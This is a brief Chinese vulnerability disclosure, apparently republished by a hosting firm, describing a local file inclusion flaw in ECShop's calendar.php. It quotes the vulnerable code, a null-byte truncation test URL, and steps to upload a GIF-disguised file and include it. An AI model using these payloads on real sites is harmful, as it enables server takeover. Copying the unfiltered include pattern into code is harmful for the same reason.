ECshop本地包含漏洞 |
发布时间: 2012/7/28 18:59:00 |
js/calendar.php $lang = (!empty($_GET['lang'])) ? trim($_GET['lang']) : ‘zh_cn’;//没有过滤,很明显的包含漏洞 if (!file_exists(‘../languages/’ . $lang . ‘/calendar.php’)) { $lang = ‘zh_cn’; } require(dirname(dirname(__FILE__)) . ‘/data/config.php’); header(‘Content-type: application/x-javascript; charset=’ . EC_CHARSET); include_once(‘../languages/’ . $lang . ‘/calendar.php’);//这里包含,需要截断 测试代码 : // 需要 magic_quotes_gpc = Off /js/calendar.php?lang=../index.php%00.(注意后面有个.) 利用方法: 先注册用户 然后上传GIF89a头的GIF文件欺骗, 然后包含 代码:http://localhost/js/calendar.php?lang=../data/feedbackimg/6_20101228vyrpbg.gif%00. 亿恩科技地址(ADD):郑州市黄河路129号天一大厦608室 邮编(ZIP):450008 传真(FAX):0371-60123888 本文出自:亿恩科技【www.enkj.com】 |